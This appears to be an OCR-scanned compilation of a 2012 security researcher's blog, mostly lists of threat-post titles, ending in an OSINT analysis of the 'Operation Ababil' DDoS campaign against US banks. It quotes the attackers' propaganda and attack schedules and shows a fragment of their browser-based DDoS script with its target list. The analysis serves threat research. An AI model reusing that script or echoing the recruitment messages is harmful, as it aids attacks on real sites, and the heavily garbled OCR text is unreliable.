ttp://blog.webroot .com/2012/05/11/spamvertised-pizzeria-order-details-themed-campaign-serving-client-sid 


e-exploits-and-malware/ 


8. http: //blog. webroot .com/2012/05/15/poison-ivy-trojan-spreading-across-skype/ 
9. http: //blog. webroot .com/2012/05/17/a-peek-inside-a-managed-spam-service/ 


10. http://blog.webroot.com/2012/05/22/ongoing-linkedin-invitation-themed-campaign-serving-client-side-exp 


oits-and-malware/ 


11. http://blog. webroot .com/2012/05/22/spamvertised-bogus-online-casino-themed-emails-serving-adware/ 


12. http://blog.webroot.com/2012/05/23/spamvertised-youtube-video-approved-and-twitter-support-themed-emai 


-lead-to-pharmaceutical-scams/ 


13. http://blog.webroot .com/2012/05/29/a-peek- inside-a-boutique-cybercrime-friendly-e-shop-part-two/ 
14. http://blog. webroot. com/2012/05/30/spamvertised-careerbuilder-themed-emails-serving-client-side-exploit 
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15. 
16. http://blog.webroot.com/2012/05/31/windstream-bill-themed-emails-serving-client-side-exploits-and-malwa 
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ttp://blog.webroot .com/2012/05/30/pop-ups- at-popular-torrent-trackers-serving-w32casonline-adware/ 


re/ 
17. http: //ddanchev.blogspot.com/ 
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8.7 July 


8.7.1 Summarizing ZDNet’s Zero Day Blog Posts for June (2012-07-10 19:02) 


ZDNet / Blog Follow via: 5) The best of ZDNet, delivered 


Get the best of ZDNet delivered straight to 
your inbox 


Ze TO D ay ZDNet Newsletters 


Ryan Naraine Latest Posts 7] ZDNet Must Read News Alerts - US: 
- r . o « . Major news is breaking are you ready? 
Ryan Naraine is a NSA: Cybercrime is ‘the greatest transfer of wealth in This newsletter has only the most 


journalist and social 
media enthusiast 
specializing in 
Internet and 
computer security 


history’ important tech news nothing else. 


The director of the National Security Agency Subscribe Nou 
(NSA) has called cybercrime “the greatest 
transfer of wealth in history.” As such, he 


issues urged politicians and the American population ke o [e) ‘in| t) Co 

in general to support cybersecurity legislation aw) 
P - . being pushed through Congress. 

Emil Protalinski 7 7 x 

Ema Protalinski has ——e wii Top Stories 

covered the tech . : 

Most . 5 . 

industry for five years ; ar Most Discussed 

for muttiple Anonymous has a new target: Pedophiles 

publications. Rae Anonymous has a new mission: Operation 1 Silent security updates coming to Apple's OS 
PedoChat. Yes. that’s naht. The hacktivist % Mountain Lion 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for June, 2012. You 
can subscribe to [2]Zero Day’s main feed , or follow me on Twitter: 


x 


01. [3]Fake Gmail Android application steals personal data 
02. [4]Facebook begins notifying DNSChanger victims 
03. [5]French E-voting portal requires insecure Java plugin 


04. [6]Credit card fraudsters sentenced in the U.K 
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05. [7]North Korea ships malware-infected games to South Korean users, uses them to launch 
DDoS attacks 


06. [8]Q &A of the Week - ’Tales from the Underground’ featuring Brian Krebs 

07. [9]24 cybercriminals arrested in Operation Card Shop’ 

08. [10]Silent security updates coming to Apple’s OS X Mountain Lion 

09. [11]BlackHole exploit kit experimenting with ‘pseudo-random domains’ feature 
10. [12]Which is the most popular antivirus software? 

11. [13]Winamp 5.63 fixes four critical security vulnerabilities 


12. [14]Chrome 20 fixes 20 security vulnerabilities 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him 
[16]Jon Twitter. 
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11. : .zdnet .com/blackhole-exploit-kit- experiment ing-with-pseudo-random-domains-feature-6080012593/ 
12. 3 .zdnet .com/which-is-the-most-popular-antivirus-software-6080012608/ 


.zdnet .com/winamp-5-63-fixes-four-critical-security-vulnerabilities-6080012616/ 


ttp://www.zdnet .com/chrome-20-fixes-20-security-vulnerabilities—6080012623/ 


15. http://ddanchev. blogspot .com/ 
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8.7.2 Summarizing Webroot’s Threat Blog Posts for June (2012-07-10 19:16) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


rf ’ a rchives 
What's the underground market's going SiS 
rate for a thousand U.S based malware 
infected hosts? foh shouts caer 


july 10, 2012 - 10:00 am Free security for your 

WRRR O 1 Votes friends AND a donation 
to charity 

By Dancho Danchev 

Imagine you're a cybercremunal that has somehow managed to mfect a 1000 U.S based hosts and is Free tools 

looking for ways to monetize his malicious activity? He could easily start spreading spam or phishing Haven't thed Webroot 

emads, use the infected hosts as a platform for dissemmating related malware attacks, or basically data SecureAnywhwere to 

mine the infected hosts for accounting data to be later on sold to fellow cybercriminals remove an infection? 


: Download a free trial 
What if all he wanted to do ts earn as much profit in the shortest possible amount of time without 


investing more efforts into the monetization of the infected hosts? Is the cybercrime ecosystem mature 
enough to offer hin an alternative? Appreciate the rhetoric. The maturing cybercrime ecosystem is fully 
capable of offering him a high iquidity monetization approach for earning revenue by infecting hosts and 
spreading a specific undetectable executable pushed by the pay-per-mstall affiliate network that I'll 
profile in this post. 


Webroot 
SecureAnywhere 
program/malware 
assistance? 

Open a support ticket 


More details: 
Concerned about a 


Read More » specific URL or IP? 
Check the renutation of 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for June, 2012. 
You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


x 


01. [3]Cybercriminals infiltrate the music industry by offering full newly released albums for 
just $1 


02. [4]A peek inside a boutique cybercrime-friendly E-shop - part three 


03. [5]DDoS for hire services offering to ‘take down your competitor’s web sites’ going 
mainstream 


04. [6]Skype propagating Trojan targets Syrian activists 


05. [7]Spamvertised ‘UPS Delivery Notification’ emails serving client-side exploits and mal- 
ware 


06. [8]Mozilla patches critical security vulnerabilities in Firefox and Thunderbird 
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07. [9]Spamvertised ‘DHL Package delivery report’ emails serving malware 


08. [10]Spamvertised ‘Your Amazon.com order confirmation’ emails serving client-side 
exploits and malware 


09. [11]Cybercriminals populate Scribd with bogus adult content, spread malware using 
Comodo Backup 


10. [12]Oracle and Apple patch critical Java security vulnerabilities 


11. [13]Spamvertised ‘Your Paypal Ebay.com payment’ emails serving client-side exploits and 
malware 


12. [14]‘Create a Cartoon of You” ads serving MyWebSearch toolbar 


13. [15]Spamvertised ‘Your UPS delivery tracking’ emails serving client-side exploits and 
malware 


14. [16]Spamvertised ‘Confirm PayPal account” notifications lead to phishing sites 
15. [17]Spamvertised ‘DHL Express Parcel Tracking Notification’ emails serving malware 


16. [18]Spamvertised bogus online casino themed emails serving W32/Casonline 


This post has been reproduced from [19]Dancho Danchev’s blog. Follow him 
[20]Jon Twitter. 


1. http://blog.webroot.com/ 
2. http://feeds2. feedburner. com/WebrootThreatBlog 
3. 
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-side-exploits-and-malware/ 
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re- — comodo-backup/ 


ttp://blog.webroot .com/2012/06/14/oracle-and-apple-patch-critical-java-security-vulnerabilities/ 
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exploits-and-malware/ 


. http: //blog. webroot .com/2012/06/22/create-a-cartoon- of -you-ads-serving-mywebsearch-toolbar/ 


http://blog.webroot .com/2012/06/25/spamvertised-your-ups-delivery-tracking-emails-serving-client-side-e 


xploits-and-malware/ 
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19. 

20. stp: //twitter.con/danchodanched 


8.8 August 


8.8.1 Summarizing ZDNet’s Zero Day Blog Posts for July (2012-08-23 18:16) 


ZDNet / Biog 


Zero Day 


Follow via: 5\ The best of ZDNet, delivered 


ZDNet Newsletters 


Get the best of ZONet delivered straight to 
your mbox 


Ryan Naraine Latest Posts / ZDNet Must Read News Alerts - US: 


: e ° . ‘ as . Major news is breaking. Are you ready? 
DHS investigating Siemens ‘flaw’ in power plant security This newsletter has only the most 


important tech news nothing else. 


Ryan Narawe is a 
journalist and socal 
meda enthusiast 
specalizing in 
Internet and 
computer security 


The U.S. government is probing Sremens’ 
technology that may allow hackers to attack Subscribe Nou 
critical infrastructure, such as power plants. 


ack Whataker 


ie 2 Comment 3 Wot - + 
= ee Ba BeOws 
Emil Protalinski 
: Crisis malware targets virtual machines , 
Emil is a freelance : Top Stories 
journalist writing for Researchers have found that malware rootkit 
CNET and ZDNet. Crisis can spread via virtual machines, Most Popule Most Discussed 
Over the years, he Windows mobile phones, Mac OS and 
has covered the tech >) Sy mantec Windows. 2 Demonosd hit by DDoS attack 


Charlie Osborne 


industry for multiple 


oe le Memnannid anne far annd? 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for July, 2012. You 
can subscribe to [2]Zero Day’s main feed , or follow me on Twitter: 


x 


01. [3]Security flaw found in Amazon's Kindle Touch 
02. [4]New contacts stealing Android malware spotted in the wild 


4000 


03. [5]Firefox 14 fixes 5 critical security vulnerabilities 
04. [6]Bogus Google Files site earns revenue through premium rate SMS micro payments 
05. [7]Research: 80 % of Carberp infected computers had antivirus software installed 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 
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. http: //feeds.feedburner.com/zdnet/securit 


1. 
2 
3 .zdnet .com/security-flaw-found-in-amazons-kindle-touch-7000001087/ 

4. http://www. zdnet .com/new-contacts-stealing-android-malware-spotted- in-the-wild-7000001296/ 
5 

6 


. http: //www.zdnet.com/firefox-14-fixes-5-critical-security-vulnerabilities-7000001297/ 


. http://www. zdnet . com/bogus- google-files-site-earns-revenue-through-premium-rate-sms-micro-payments- 700000 


= 


676/ 


http: //www.zdnet .com/research-80-of-carberp-infected-computers-had-antivirus-software- installed-70000016 


. http://ddanchev.blogspot.com/ 
. http: //twitter .com/danchodanche 


ig) 


oO © 


8.8.2 Summarizing Webroot’s Threat Blog Posts for July (2012-08-23 19:05) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


Cybercriminals spamvertise bogus feces - 
greeting cards, serve exploits 

Referral Program 
and malware Talk about 2 win wis 


Free security for your 
friends AND a donation 


to charity 
By Dancho Danchev 
Think y« nine greeting card from 123greetings.com? Think twice Free tools 

Haven't tned Webri 
Over the past if of days ybercrimina have spamvertised n ns of « zis mnpe nating the Se jreAnywhwere te 
popular ard serv 123greetings.com m an attempt to tick end and rporate users int kang remove an miection 
or 1 ploits and malware serving link wtesy of the Black Hole web malware exploitatior Download a free trial 
kit 
What spe | about tt Mp age mn we mnect it to previously spamvertused Campaign: SecureAnywhere 
profied at Wet t Threat Blog? Let's find out program malware 

, tance 
' det Open a support ticket 
Read More » med t 

erne pou } 

specific URL or IP? 

Tell your friends: Hj Facebook Ej twitter Digg <5 Recait © StumbleUpon [fi Email Check the reputation of 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for July, 2012. 
You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 
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01. [3]Cybercriminals launch managed SMS flooding services 

02. [4]117,000 unique U.S visitors offered for malware conversion 

03. [5]Phishing campaign targeting Gmail, Yahoo, AOL and Hotmail spotted in the wild 

04. [6]What’s the underground market’s going rate for a thousand U.S based malware infected 

hosts? 

05. [7]Spamvertised American Airlines themed emails lead to Black Hole exploit kit 

06. [8]Online dating scam campaign currently circulating in the wild 

07. [9]New Russian service sells access to compromised social networking accounts 

08. [10]Cybercriminals impersonate UPS in client-side exploits and malware serving spam 

campaign 

09. [11]Russian Ask.fm spamming tool spotted in the wild 

10. [12]Spamvertised Intuit themed emails lead to Black Hole exploit kit 

11. [13]Cybercriminals impersonate Booking.com, serve malware using bogus ‘Hotel Reserva- 

tion Confirmation’ themed emails 

12. [14]Spamvertised Craigslist themed emails lead to Black Hole exploit kit 
[15]Cybercriminals impersonate law enforcement, spamvertise malware-serving ‘Speed- 

ing Ticket’ themed emails 

14. [16]Spamvertised ‘Download your USPS Label’ themed emails serve malware 

15. [17]Cybercriminals target Twitter, spread thousands of exploits and malware serving 

tweets 

16. [18]Russian spammers release Skype spamming tool 

17. [19]Spamvertised ‘Your Ebay funds are cleared’ themed emails lead to Black Hole exploit kit 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him 
[21]on Twitter. 
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17. bttp://blog.webroot.com/2012/07/27/cybercriminals-target-twitter-spread-thousands-of-exploits-and-malwa 


18. http://blog.webroot .com/2012/07/30/russian- spammers-release-skype-spamming-tool/ 


19. http://blog. webroot .com/2012/07/31/spamvertised-your-ebay-funds-are-cleared-themed-emails-lead-to-black 
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8.9 September 


8.9.1 Dissecting Operation Ababil’ - an OSINT Analysis (2012-09-28 00:25) 


Provoked by a questionable online video posted on YouTube, Muslims from the around the 
world united in an apparent [1llopt-in botnet crowdsourcing campaign aiming to launch a 
DDoS (denial of service attack) against YouTube for keeping the video online, and against 
several [2]major U.S banks and financial institutions. 


Dubbed "Operation Ababil", and operated by the Izz ad-Din al-Qassam a.k.a Qassam Cy- 
ber Fighters , the campaign appear to have had a limited, but highly visible impact on the 
targeted web sites. Just like in every other crowdsourced opt-in botnet campaign such as 
the "[3]Coordinated Russia vs Georgia cyber attack in progress", the "[4]lranian opposition 
launches organized cyber attack against pro-Ahmadinejad sites", the "[5]Electronic Jihad 
v3.0 - What Cyber Jihad Isn’t" campaign, and the "[6]The DDoS Attack Against CNN.com" 
campaign, political sentiments over the attribution element seem to have orbited around the 
notion that it was [7 ]nation-sponsored by the Iranian government. 


What’s so special about this attack? Did the individuals behind it poses sophisticated 
hacking or coding abilities? Was the work of hacktivists crowdsourcing bandwidth, or was it 
actually sponsored by the Iranian government? Can we even talk about attack attribution 
given that the group claiming responsibility for the attacks doesn’t have a strong digital 
fingerprint? 


In this post, I’ll perform an OSINT (open source intelligence) analysis aiming to expose 
one of the individuals part of the group that organized the campaign, spread their propaganda 
message to as many Muslim Facebook groups as possible, and actually claim responsibility for 
the attacks once they took place. 


The campaign originally began with a message left on Pastebin.com by the Qassam Cy- 
ber Fighters group announcing "Operation Ababil": 
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Operation Ababil, The second week 


In the previous announcements we stated that we will not tolerate insulting exalted character of the prophet of 
mercy and kindness. Due to the insult, we planned and accomplished a series of cyber operations against the 


insulting country's credit and financial centers. 


Some U.S. officials tried to divert people's attention from the subject and claimed that the main aim of the 
operation was not deal to insults but it had other intentions. The officials claimed that certain countries have 


taken these measures to solve their internal problems. 


We strongly reject the American officials’ insidious attempts to deceive public opinion. We declare that the 
kindness and love of Muslims and free-minded people of the world to the great prophet of Islam is much more than 


their violent anger be deflected and controlled by such deceptive tricks. 


Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). So as 


we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet. 


Therefore, we suggest a Timetable for this week attacks. Knowing which times the banks and other targets are out 
of service, the customers of targeted sites also can manage to do their jobs as well and have a rest while the 


specific organization is under attack. 


We shall attack for 8 hours daily, starting at 2:3@ PM GMT, every day. We repeat again the attacks will continue 


for sure till the removal of that sacrilegious movie. 


The original message left is as follows: 

"Operation Ababil, The second weekin the previous announcements we stated that we will not 
tolerate insulting exalted character of the prophet of mercy and kindness. Due to the insult, 
we planned and accomplished a series of cyber operations against the insulting country’s 
credit and financial centers.Some U.S. officials tried to divert people’s attention from the 
subject and claimed that the main aim of the operation was not deal to insults but it had other 
intentions. 


The officials claimed that certain countries have taken these measures to solve their in- 
ternal problems.We strongly reject the American Officials’ insidious attempts to deceive public 
opinion. We declare that the kindness and love of Muslims and free-minded people of the 
world to the great prophet of Islam is much more than their violent anger be deflected and 
controlled by such deceptive tricks.Insult to a prophet is not acceptable especially when it is 
the Last prophet Muhammad (Peace Be upon Him). 


So as we promised before, the attack will be continued until the removal of that sacrile- 
gious movie from the Internet.Therefore, we suggest a Timetable for this week attacks. 
Knowing which times the banks and other targets are out of service, the customers of targeted 
sites also can manage to do their jobs as well and have a rest while the specific organization 
is under attack.We shall attack for 8 hours daily, starting at 2:30 PM GMT, every day. 


We repeat again the attacks will continue for sure till the removal of that sacrilegious 
movie.We invite all cyberspace workers to join us in this Proper Act. If America’s arro- 
gant government do not submit, the attack will be large and larger and will include other 
evil countries like Israel, French and U.Kingdom indeed.Tuesday 9/25/2012 : attack to 
Wells Fargo site, www.wellsfargo.comWednesday 9/26/2012 : attack to U.S. Bank site, 
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www.usbank.comThursday 9/27/2012 : attack to PNC site, www.pnc.com Weekends: planning 
for the next week’ attacks.Mrt. 1zz ad-Din al-Qassam Cyber Fighters" 


Periodically, the group also released update notes for the campaigns currently taking 
place: 


«§ Operation Ababil : second step over chase.com — 
BY: QASSAMCYBERFIGHTERS ON SEP 19TH, 2012 | SYNTAX: NONE | SIZE: 0.47 KB HITS: 2874 | EXPIRES: NEVER 
DOWNLOAD | RAW | EMBED | REPORT ABUSE 

=| =) (8 


“Operation Ababil” started over BoA : 


http://pastebin. com/mCHia4éwsS 
http: //pastebin. com/whma9zyG 


In the second step we attacked the largest bank of the united states, the "chase” bank. These series of 


attacks will continue untill the Erasing of that nasty movie from the Internet. 


The site “www.chase.com” is down and also Online banking at “chaseonline.chase.com" is being decided to 


be Offline ! 
Down with modern infidels. 


### Cyber fighters of Izz ad-din Al qassam ### 


The original message published is as follows: 

"Operation Ababil" started over BoA :http://pastebin.com/mCHia4W5 
http://pastebin.com/wMma9zyGiIn the second step we attacked the largest bank of the 
united states, the "chase" bank. These series of attacks will continue untill the Erasing of that 
nasty movie from the Internet.The site "www.chase.com" is down and also Online banking at 
"chaseonline.chase.com" is being decided to be Offline !Down with modern infidels. # # # 
Cyber fighters of Izz ad-din Al qassam # # #" 


Second statement released by the group: 


4005 


«6 Bank of America and New York Stock Exchange under attack unt a 
BY: QASSAMCYBERFIGHTERS ON SEP 18TH, 2012 | SYNTAX: NONE | SIZE: 1.06 KB | HITS: 7,579 | EXPIRES: NEVER 
DOWNLOAD | RAW | EMBED | REPORT ABUSE 
=| =) |S 
Dear Muslim youths, Muslims Nations and are noblemen 
When Arab nations rose against their corrupt regimes (those who support Zionist regime) at the other 
hand when, Crucify infidels are terrified and they are no more supporting human rights. United States of 
America with the help of Zionist Regime made a Sacrilegious movie insulting all the religions not only 
Islam. 
All the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is necessary 
to stop spreading this movie. We will attack them for this insult with all we have. 
All the Muslim youths who are active in the Cyber world will attack to American and Zionist Web bases as 
much as needed such that they say that they are sorry about that insult. 
We, Cyber fighters of Izz ad-din Al qassam will attack the Bank of America and New York Stock Exchange 
for the first step. These Targets are properties of American-Zionist Capitalists. This attack will be 
started today at 2 pm. GMT. This attack will continue till the Erasing of that nasty movie. Beware this 
attack can vary in type. 


Down with modern infidels. 


The original message published is as follows: 

"Dear Muslim youths, Muslims Nations and are noblemenWhen Arab nations rose against their 
corrupt regimes (those who support Zionist regime) at the other hand when, Crucify infidels 
are terrified and they are no more supporting human rights. United States of America with the 
help of Zionist Regime made a Sacrilegious movie insulting all the religions not only Islam.All 
the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is 
necessary to stop spreading this movie. 


We will attack them for this insult with all we have.All the Muslim youths who are active 
in the Cyber world will attack to American and Zionist Web bases as much as needed such 
that they say that they are sorry about that insult.We, Cyber fighters of Izz ad-din Al qassam 
will attack the Bank of America and New York Stock Exchange for the first step. These Targets 
are properties of American-Zionist Capitalists. This attack will be started today at 2 pm. GMT. 
This attack will continue till the Erasing of that nasty movie. Beware this attack can vary in 
type. Down with modern infidels." 


Clearly, the group behind the campaigns aimed to deliver concise propaganda to prospective 
Internet connected users who would later on be instructed on how to participate in the DDoS 
attacks. Let’s assess the potential of the distributed DDoS tool that was used in the campaign. 


Sample screenshot of the DDoS script in Arabic: 
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s by administrator of the site 


Inside the .html file, we can see that there are only three web addresses that will be targeted 
in their campaign: 


oe SIripue typo rrruuere Ce id mesaaye vaiuec= dl 
</div> 
<div> 
<d1> 
<label id="statuss"></label> 
<dd style="opacity: 0.5;display:none;" id="requestedctr"></dd> 
<dt style="opacity: 0.5;display:none;" >&nbsp;</dt> 
<dd style="opacity: 0.5;display:none;" id="succeededctr ">0</dd> 
<dt style="opacity: 0.5;display:none; “>&nbsp; </dt> 
ao style="opacity: 0.5;display:none;" id="fai ledctr">0</dd> 
</ > 
</div> 
<script> 
var i=0; 
var targets = = ArrayQ; 


targets. pus : P 
targets. push(' HEEe: // wow. nasdaq. com/" = 
targets. push("http: //www. BankofAmerica. com 


(function Q) { 

var fireInterval; 

var isFiring = false; 

var requestedctrNode = document. geteElementById("requestedctr"), 
succeededctrNode = document. gete lementById(’ “succeededctr"), 
failedctrNode = document. getElementById("failedctr"), 
targetURLNode = document. getElementById("targetURL"), 
FireButton = document. getElementById(' ‘fireButton' ee 
messageNode = pasaeageelecny picebomapeliry Seah message"), 
rpsNode = document. getElementById('rps"), 
timeoutNode = document. getElementById("timeout"), 

statuss = document. getElementById("statuss"); 
var targetURL = targetURLNode. value; 
tarqetuRLNode. onchange = function () { 


Detection rate for the DDoS script: 

youtube.html - [8]MD5: c3fd7601b4aefe70e4a8f6d73bf5c997 

Detected by 6 out of 43 antivirus scanners as HfTool-Loic; Hacktool.Generic; TRO} 
_GEN.F47V0924 


Originally, the attack relied on a static recruitment message which included links to the 
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DIY DDOS script located on 4shared.com and Mediafire.com. What’s particularly interesting is 
the fact that the files were uploaded by a user going under the handle of "Marzi Mahdavi II". 
It’s important to point out that these static links were distributed as part of the recruitment 
campaign across multiple Muslim-friendly Facebook groups. 

Thanks to this fact, we could easily identify the user’s Facebook account, and actually spot the 
original message seeking participation in the upcoming attacks. 


Marzi Mahdavi II’s Facebook account: 


Marzi Mahdavi II (.ss.p0 12,0) Subscribe | | Message # + 


@ Worked at ola) odor) Bod Soy eed 
@ Lives in Tehran, Iran 37 1- 
@ From Tehran, Iran 
? Female 
About Subscribers 


Do you know Marzi? Subscribe to Mars | 


Work and Education 
Opti ney Qud Sp yu w 


aaa lS! UL Logucres Dinaies a JS 


Lives in Tehran, Iran 


“br 


«) Favorites See Al 


Sample shared Wall post seeking participation in the upcoming DDoS campaign: 
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2 | Marzi Mahdavi I Timeline ~ Now + | 


2 aaS GSLy> yj Sad jl suilguo ly US gl 


+ oclaiw!l (jv5) 


pr Sls b&b aS lol ly Ul 9 9395 Slyreiawl 033489 [p19 U9) jl 1) V9 azo 
aiSao CuJled wy F9).5 aoliy Start Attack aoS» iS) 


Sample blog post enticing users to participate: 
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As Cyber fighters of Izz ad-din Al gassam asked, TRUEST TENT se) eS 
Qi'dah at 5 o’clock pm. Mecca time (14:00 GMT) Bank of America and New 


Just like Attack to YouTube site you can Download the Links and run the web 
page and simply hit the Start at the time of Attack. 


Marzi Mahdavi Il has once referenced a link pointing to the same blog, clearly indicating that 
he’s following the ongoing recruitment campaigns across multiple Web sites: 


Second blog post enticing users to participate in the DDoS campaign: 
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According to YouTube administrator refusal to remove the prophet of Islam- 
insulting video, an internet group has developed a computer program -— that is 
approved by Hilf-ol-Fozoul experts — to prevent the release of the video. 
When they run that program, YouTube will be impaired. 

For more influence of this action, it is necessary to run the program by a large 
number of users simultaneously. 

Tomorrow on 15 September at 4 pm. (Mecca Local Time) the action will begin. 
The considered file has been designed in html format. You can download it 
from links below: 

Link 1 


This very latest example of Iran’s hacktivist community understanding of the cyber opera- 
tions, once again lead me to the conclusion that what we’ve got here is either the fact that 
Iran’s hacktivist community is lacking behind with years compared to sophisticated Eastern 
European hacking teams and cybercrime-friendly communities, or that Iran is on purposely 
demonstrating low cyber operation capabilities in an attempt to trick the Western world into 
thinking that it’s still in a “catch up mode" with the rest of the world when it comes to offensive 
cyber operations. 


Did these coordinated DDoS campaigns actually had any impact on the targered web 
sites? According to data from the Host-Tracker, they seem to have achieved limited, but 
visible results, a rather surprising fact given the low profile DDoS script released by the 
Campaigners. 


Sample Host-Tracker report for a targeted web site during the campaign: 
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host-tracker.com '~ 


@ website monicring service 


Fe UAT sw nbvart comc0 Connection timed 
an’) 


Hep error Une. ne_error(, 
——— Ser tart com 80 Carractan mes 


22.97 we 


2102 se 


22.00 sec 


MontGWcore 
vathentng 


970.295.206.083 


970, 835.206.1083 HOSTED 


TPO. EIS.206.183 Froreoy tet 


SPO. 235.206.1083 WS server ru 


U7O.ES.206. WE boris Howting 


37O.2.206.03 Seeadfoet 


STOLE 226. MOK Hosting 


POLIS OTL hewtrg 


S7O SFR 26S POrmet 


NordGete 


7027520683 is 


970.375.206.183 Oye e 


VOIB26.U er 


170, 295.206. 183_ -VOEH4 come 


7.235.206.1813 erroette 


270.235.206.81 powtfood 


270.E35206. Ud Cyter Sruke Let 


SPO SIB206.188 ASery ete 


VOIB26U Perce 


TO.135.206.18t AbCrerre 


270.2206. 82 Prerureeer 


Second Host-Tracker report for a targeted web site during the campaign: 
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host-tracker.com “/ 


website monitoring service 


http: .wellsfargo.co’ 
Se 


Skiecr be fr free emal aborts and ot aadiblty fer hatps/ /werw.wolisfargo.com 
Yt pas Geral lee 


Received resporees: 2 Ok 35 Fat Average: OA2sec 0.00 mr. 
1p ets 

Callas, TX, US error simp _clent Bad_message (Uninc OD ow 199.45.2.68 Provmoy Net 
reason (0.9 unexpected eof, teneout)") 


Cs) n 
Now York, ty, HostGW.com, 
yg STs. USA2 wee 39.45.2468 Wabhosting 


chet Bad _ creme Urine 
Feason (0.9 unexpected eof, trnecut)") 
rep 


Kev, Urraine error $p_chent Bad_messageClrinoer OD IRAS 2B HOSTLO 
reascn (0.9 Unexpected eof, trnecut)") 
Mirek, Gelirus error imp chert fad _rresnage Curing OM uw 399.45.66.303 betefotayt Les 
reascn, 
OW YS1.252.00.323 Stpactyhent 
area, error }Rp_chert Bad_meageCurinoen 2.00 wee 151.552.98.339 Upgradentry 
romen 
Aratoedam, = 
Hp chart Bad _maseage Urine 00 we 151.351.908.233 Fotos 
on, chert. Bad_meneageCUrinoen West Cost 
cA Us STO HRY, 2.00 we 151.151.98.133 hostrg 
Ug TOT Hp _chhenk Bad _mostageCUrinoen 4.00 wee BAS.248 CH Web Hosting 
Montreal, 
chert Bad message Curnow ” 
Quebec, Ca error Hep, : 2.00 we 199,.45.46,.201 ©P-Hontrg.com 
SPD, Russe error Hep _clert.fad_message(Urinoen 0.00 vec 199.45.66.201 Incihoet 
reason 


40.00 vec 151.151.988.133 Hostrwnter, Unt 


= error Hep _clert. Bad_messageCUrinoen 2.00 wc 199,45.46.301 Joomla Hosting 


Custom Hosting 


Dalles, TX, US error Hep_chent. Bad_message(Uninoen 40.00 we 151.151.98.133 
Soltions 


Dallas, TX, US error Hep_clhent Bad_messageCUrinoen 00 wc 199.45.46.301 Exthorting 
reason 
NETO error +p 40.00 sec 1S1.151.98.133 VPS-sorver.ru 


pone NordGate 


error Hp _chert. Bad_messageCurinoen 00 wc 199.45.66.201 ; 


Lansing, Mi eran Hp. 40.00 sec 151.151.88.133 Ricserver 


Third Host-Tracker report for a targeted web site during the campaign: 
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host-tracker.com “»/ 
website monitoring service 


Tuesday, September 18, 2012 6:14:47 PM 
of) 


n 


Subscribe for free email alerts and site availability reports for http:// www.BankOfAmerica.com 
rere 


type your@emal here 
Recelved responses: 14 Ok 32 Fail Average: 16.30sec 0.00 
Http 
New York, te error :Hittp_client.Bad_message(“Unknown 115.01 sec 171.159, 100.173 Parana 
reason (@.g. unexpected eof, timeout)") vebhosting 
Http 
Pe. error Http_client.Bad_message(Urknawn 40.00 sec 171.199.100.173 Nicosoft Media 
reason (€.g. unexpected eof, timeout)") 
Http 
—_ ‘ @rror:Http_client.Bad_message(“Unknown 80.50 sec 171.161.148.173 Apto Hosting 
reason (@.g. unexpected eof, tirreout)") 
Http 
Dallas, TX, US error:Hitp_client.Bad_message("Unknown 80.50 sec 171.159, 100.173 Provisoy.Net 
reason (6.g. unexpected eof, timeout)") 
Http 
Kiev, Ukraine error:Http_client.Bad_message("Uinknown 80.51 sec 171.159.100.173 HOSTED 
reason (@.g. unexpected eof, timeout)") 
Http 
alii error :Hittp_client.Bad_message(“Unknown 40.00 sec 171.199.100.173 Joomla Hosting 
reason (6.9. unexpected eof, tirmeout)") 
Http 
Dallas, TX, US error:Http_client.Bad_message(Unknown 40.00 sec 171.199.100.173 $m Nesting 
reason (€.g. unexpected eof, timeout)") aces 
Http 
Lansing, Ml error Http_cllent.Bad_message("Urknown 40.00 sec 171.161.148.173 Rioserver 
reason (€.g. unexpected eof, timeout") 
eee ok 0 65.22sec 0.00 171.159.228.173 Phil-Hosting.com 
Http 
Paris, France error:Http_client.Bad_message("Unknown 40.00 sec 171.161.148.173 Cyber Snake Ltd 
reason (@.g. unexpected eof, tirreout)*) 


Fourth Host-Tracker report for a targeted web site during the campaign: 
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Add buttons to your sit 


Rune) 
Get batt 


Cra» 
Got batt 


host-tracker.com  *’ 


website monitoring service 


Subscribe for free email alerts and site availability re 
type your@email here 


Received responses: 39 Ok 8 Fail 
Atlanta, GA, US Http error :303 
Lansing, MI, US Http error :303 
Orlando, FL, US Http error :303 

London, UK Http error :303 
Kansas City, MO, US Http error :303 


Frankfurt, Germany Ok 
Dallas, TX, US Http error :303 
Minsk, Belarus Ok 


Los Angeles, CA, US Http error :303 
Paris, France Http error:303 


Dallas, TX, US Ok 
Washington, USA Ok 
Montreal, Quebec, Ca Ok 
Moscow. Russia Ok 


Average: 


154494 
179298 


0.88 sec 
0.09 sec 
0.07 sec 
0.06 sec 
0.05 sec 
0.08 sec 
0.48 sec 
1.29 sec 
0.68 sec 
0.10 sec 
0.11 sec 
0.44 sec 
0.38 sec 
2.43 sec 
0.67 sec 


183.18 
74.125.227.1 Rioserver 
173.194.37.4 Apto Hosting 

74.125.225.68 Admo.net LLC 

343.63 173.194.70.190 mrhost.biz 

227.44 = 173.194.32.36 BellnfoNet Ltd. 
173.194.33.2 PremiumReseller 

342.61 74.125.227.105 Custom Hosting Solutions 

413.41 74.125.228.66 Nidohosting 

62.20 173.194.43.2 NordGate networks 


261.83 173.194.32.200 JustHost 


Fifth Host-Tracker report for a targeted web site during the campaign: 
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English French Pycous’ Spanish 


Main page Speedtest > Prices Signup Login 


host-tracker.com = "e/ 


website monitoring service 


Thursday, September 27, 2012 5:09:35 PM 
Ea flin| 
Permanent link to this check result 


Subscribe for free email alerts and site = http: // www.pne.com 
Subsoribe 


type your@email here 


Received responses: 22 Ok 14 Fail Average: 5.32sec 0.02 
on a Ha error :Http_client.Bad_message(“Unknown 115.01 sec 170.201.60.3 esencom 
